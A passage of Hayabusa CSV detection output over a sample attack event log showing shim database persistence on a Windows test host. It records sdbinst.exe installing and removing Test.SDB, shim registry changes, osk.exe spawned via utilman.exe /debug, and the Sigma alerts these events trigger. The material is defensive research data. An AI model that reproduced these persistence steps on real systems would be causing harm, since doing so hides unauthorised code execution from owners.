calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1600 | PGUID: 365ABB72-53C0-5C91-0000-001044FC0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:16.406 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:16.436 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1904 | PGUID: 365ABB72-53DE-5C91-0000-00105C050200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:16.626 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1980 | PGUID: 365ABB72-53DE-5C91-0000-00104D160200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:17.026 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\UI0Detect.exe | Process: C:\Windows\System32\UI0Detect.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2040 | PGUID: 365ABB72-53DF-5C91-0000-0010452D0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:22.404 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe SYSTEM | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2464 | PGUID: 365ABB72-53F2-5C91-0000-001081FE0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:42:00.148 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""taskhost.exe"" | Process: C:\Windows\System32\taskhost.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x33435 | PID: 2640 | PGUID: 365ABB72-5418-5C91-0000-001089390300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:42:00.329 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2684 | PGUID: 365ABB72-5418-5C91-0000-0010BF400300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:42:00.419 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\slui.exe"" | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2692 | PGUID: 365ABB72-5418-5C91-0000-001076420300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:42:00.489 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x33435 | PID: 2756 | PGUID: 365ABB72-5418-5C91-0000-0010784B0300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:42:37.392 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logon | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x33435 | PID: 2948 | PGUID: 365ABB72-543D-5C91-0000-00102FA20300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:42:37.432 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2960 | PGUID: 365ABB72-543D-5C91-0000-001099A30300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:42:37.602 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x33435 | PID: 2984 | PGUID: 365ABB72-543D-5C91-0000-001099A60300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:42:38.654 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3068 | PGUID: 365ABB72-543E-5C91-0000-001009C90300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:42:38.704 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\PSEXESVC.exe"" | Process: C:\Windows\PSEXESVC.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3080 | PGUID: 365ABB72-543E-5C91-0000-001096D00300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:42:38.774 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: msg * ""hello from run key"" | Process: C:\Windows\System32\msg.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | LID: 0x33435 | PID: 3144 | PGUID: 365ABB72-543E-5C91-0000-001071E70300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:43:24.560 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" | Process: C:\Program Files\Windows Media Player\wmpnetwk.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 3628 | PGUID: 365ABB72-546C-5C91-0000-00106A730400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:46:04.916 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2336 | PGUID: 365ABB72-550C-5C91-0000-001063E60400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:46:20.518 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | Process: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 2704 | PGUID: 365ABB72-551C-5C91-0000-001030590500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:46:25.856 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 1036 | PGUID: 365ABB72-5290-5C91-0000-0010E6D10000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:47:56.436 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\cmd.exe | Process: C:\Windows\Explorer.EXE | PID: 2984 | PGUID: 365ABB72-543D-5C91-0000-001099A60300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:47:56.436 +00:00,PC01.example.corp,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.439 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2112 | PGUID: 365ABB72-55A1-5C91-0000-0010AB8C0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.439 +00:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.459 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{4f02f780-dd6c-40e3-ab21-c1336815b4db}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2112 | PGUID: 365ABB72-55A1-5C91-0000-0010AB8C0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.459 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.459 +00:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/file_event_win_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.499 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.499 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.499 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.509 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.559 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3724 | PGUID: 365ABB72-55A1-5C91-0000-0010F48F0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.559 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3724 | PGUID: 365ABB72-55A1-5C91-0000-0010F48F0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.860 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3612 | PGUID: 365ABB72-55A1-5C91-0000-00102D930700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.870 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2368 | PGUID: 365ABB72-55A1-5C91-0000-0010D6960700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.870 +00:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.920 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3404 | PGUID: 365ABB72-55A1-5C91-0000-00101D9B0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.930 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3404 | PGUID: 365ABB72-55A1-5C91-0000-00101D9B0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:36.644 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3004 | PGUID: 365ABB72-55A4-5C91-0000-00103DA60700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.787 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2236 | PGUID: 365ABB72-55D7-5C91-0000-001067BD0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.787 +00:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.807 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{d2c22380-b7b0-4d3a-b36e-bb0e804c265c}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2236 | PGUID: 365ABB72-55D7-5C91-0000-001067BD0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.807 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.807 +00:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/file_event_win_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.857 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.857 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.857 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.867 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.967 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3916 | PGUID: 365ABB72-55D7-5C91-0000-0010DAC00700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.978 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3916 | PGUID: 365ABB72-55D7-5C91-0000-0010DAC00700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.988 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3908 | PGUID: 365ABB72-55D7-5C91-0000-0010DDC30700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:28.158 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3740 | PGUID: 365ABB72-55D8-5C91-0000-00108AC80700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:28.158 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3648 | PGUID: 365ABB72-55D8-5C91-0000-001060C90700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:28.158 +00:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:28.168 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3740 | PGUID: 365ABB72-55D8-5C91-0000-00108AC80700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:31.212 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 4024 | PGUID: 365ABB72-55DB-5C91-0000-001094D60700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.792 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 4052 | PGUID: 365ABB72-55E8-5C91-0000-001037DF0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.792 +00:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.802 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{bebe1bf6-4a2e-46ad-9266-3fbf73d269a4}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 4052 | PGUID: 365ABB72-55E8-5C91-0000-001037DF0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.802 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.802 +00:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/file_event_win_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.822 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.822 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.822 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.832 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.972 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 2668 | PGUID: 365ABB72-55E8-5C91-0000-0010A9E20700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.972 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator 